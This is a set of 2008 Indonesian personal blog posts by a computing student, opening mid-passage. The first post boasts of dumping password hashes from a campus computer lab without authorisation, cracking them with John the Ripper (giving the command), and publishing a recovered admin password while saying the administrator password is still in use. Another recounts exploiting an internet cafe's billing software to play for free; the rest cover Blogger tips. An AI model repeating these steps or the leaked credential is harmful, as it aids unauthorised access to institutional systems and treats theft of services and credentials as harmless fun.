dan akhirnya itu admin dateng dan menyelesaikan install *padahal gw juga ngerti si install2 doang* dan gw langsung buru2 pulang kerumah, dengan sudah membawa hasil 'dump' password dari lab komputer kampus.. :D

Sesampai nya dirumah gw copy psw.txt yang gw udah dapet.. dan gw crack dengan JTR (John The Ripper). Ekstrak ke folder John di drive C (biar gampang), terus copy hasil psw.txt ke folder tersebut.. abis itu buka JTR dari command prompt.

ketik : john-mmx psw.txt

dan tunggu beberapa saat.. terus Berhasiill !!
Yah itu aja pengalaman gw menggunakan pwdump & JTR untuk crack password.. gambar screenshoot yang gw tampilin disini gw bikin ulang pake komputer sendiri..

Jadi akhirnya.. gw sekarang udah dapet password admin di kampus gw...

administrator : ...... *edit: masih kepake buat gw.. ahahha*
admin : matilampu

Diapain yahhh?? hehehhe
moga - moga bermanfaat yahh...

Hack ??

2008-01-24T00:50:00.000+07:00

Hack ? Hack ?

Istilah Hack mungkin dapat dibilang, hal ke-2 yang buat saya sangat 'interest' dengan komputer.. No-1 nya tetep game lahh :D yang sampai pada akhirnya gw sekarang udah kuliah di jurusan Teknik Informatika..

Kalo di inget-inget, gw mengalami masa2 sulit untuk mengetahui 'apa itu hack?', seperti pada newbs" lainnya, seharian gw cari di google untuk memahami apa itu hack?

walaupun, untuk sampai saat ini gw juga ga mengangap diri gw sebagai seorang 'hacker', karena emang ilmu yang masih cetek.. tapi gw selalu ke inget ada orang yang nulis begini
"i am not hacker, but i believe someday i will…"

Waktu gw smp, gw doyan baget maen CS (Counter - Strike) di warnet yang ada di depan SMP gw sekitar taun 2000. Jaman gw pertama kali gw main, komputernya cuman ada 5.. terus makin lama makin banyak.

Dulu sistem billing nya manual!, pake kertas.. ahahah.. aneh banget dah.. sangking banyak banget yg waiting list, kalo maen ga boleh nambah jam.. di batesin jam nya..

Cuman enaknya, kalo main malem.. kadang2 bisa gratis.. Tapi lama2, itu warnet mulai pake software billing.

di pikiran gw "waduh.. kalo malem ga bisa gratis lagi nih" yah dasar, pikiran anak sekolahan... uang jajan seadanya..

Setelah main beberapa minggu disana, gw pernah mengalami 'hang' pada saat lagi main CS, buru2 gw restart itu komputer, dan begitu kompie nya udah nyala tanpa basa - basi gw langsung klik icon CS, *maklum lagi seruuu*

Nah mulai deh tuh gw binggung.. gw kan main paket 3 jam.. tapi udah lewat 30 menit dari seharusnya.. tapi kok CS nya kagak ketutup - tutup??

Dan secara tidak sengaja.. *maklum ga ngerti apa2* gw menemukan bug pada program billing ini.

Pada saat komputer baru startup dia kan menjalankan 'program billing' tersebut, tapi sebelum program billing itu jalan, gw udah keburu buka Program CS nya.

Nah.. trik tersebut akhirnya gw pake ampe kira2 1 taun (sampe kelas 2 smp), pake nya pas malem/lagi rame ajaa... biar operator warnet nya ga terlalu merhatiin status di servernya..
tapi ahirnya mereka ganti program billing, gara2 temen yang gwkasih tau ketauan ama operator nya.. ahahaha

Yup.. itu pengalaman gw, *baru sadar juga kalo ini hack ternyata* hack kah? :D

HTML code di Blogger

2008-01-23T23:47:00.000+07:00

Tadi pas gw lagi nulis posting sebelumnya 'Emoticon di Blogger' gw dapet sebuah masalah.
Di posting itu gw coba masukin code HTML, tapi pas gw udah selesai ngetik dan pengen gw publish, ada tulisan error HTML dari blogger-nya ??

Wah, setelah gw coba liat, ternyata dari 'compose' nya itu juga langsung ngebaca HTML code, waah.. repot dong ni.. gw harus convert itu kode HTML, biar tampilannya jadi tulisan biasa..

Setelah coba search di om google, untung banget... ada generator nya di Quick Escape
Jadi tools disini berfungsi untuk generate HTML code, menjadi kode yang dapat dibaca oleh kita..

copy paste kode html, abis itu di convert aja.. jadi deeeh..

Kok kayaknya, gw baru coba bikin blog.. kendala nya banyak banget yah..
fitur editor buat posting blog nya kurang oke nih.. butuh yg bener" WYSIWYG (What You See Is What You Got), biar gampang gituu...

Gpp deh.. buat pembelajaran... :)

Emoticon di Blogger

2008-01-23T23:08:00.001+07:00

Wew.. barusan gw bikin ni blog, baru sadar kalo ga ada feature 'Emoticon' nya..
rada 'kecewa' juga nih.. gw coba cek macem wordpress segala ada 'emoticon'-nya.. Maklum, kebiasaan chat di MSN, yang serba emoticon.. :)

Males mau bikin ulang lagi.. ahaha.. jadi coba tanya om 'Google' deh..
ga lama kemudian dapet di http//bloggingsecret.net

ternyata mudah banget.. jadi

1. Buka ke pengaturan ->Edit Html

2. Pake 'Search' (ctrl+f) cari : ]]></b:skin>

3. Nah begitu udah dapet, tambahin code ini dibawah nya :

<script src=\'http://louislim2.googlepages.com/addSmiley.js \' type=\'text/javascript\'/>

4. Yup, selesai sudah.. sekarang udah bisa pake emoticon nyaa :D

Welcome to Dhiratara's Blog

2008-01-23T22:28:00.000+07:00

Halo semuanya, ga tau kenapa tiba - tiba gw kepikiran untuk buat sebuah blog, dulu sempet di ajakin sama temen - temen buat ikutan ngisi blog. Tapi gw orang nya males banget buat nulis", karena gw masih mikirnya.. diary on-line? penting ga sih.. ahahah

Tapi beberapa akhir ini, gw sering ngerjain tugas atau lagi cari informasi" baik buat kebutuhan kampus atau cuman mendukung hobi gw yg ngoprek" komputer, kebanyakan di dukung dari info" yang ditulis pada blog" yang sudah banyak beredar, dan gw ngerasa banyak terbantu aja sama blog" itu.

Jadi gw coba bikin blog gw sendiri, dan coba 'share' info atau pengalaman gw, palingan sih ga jauh dari 'Komputer' karena emang gw mahasiswa TI di salah satu perguruan tinggi swasta di indonesia.

Gw harap hasil" postingan di blog gw ini bisa berguna buat kalian semua.

Best regards.

Arkka Dhiratara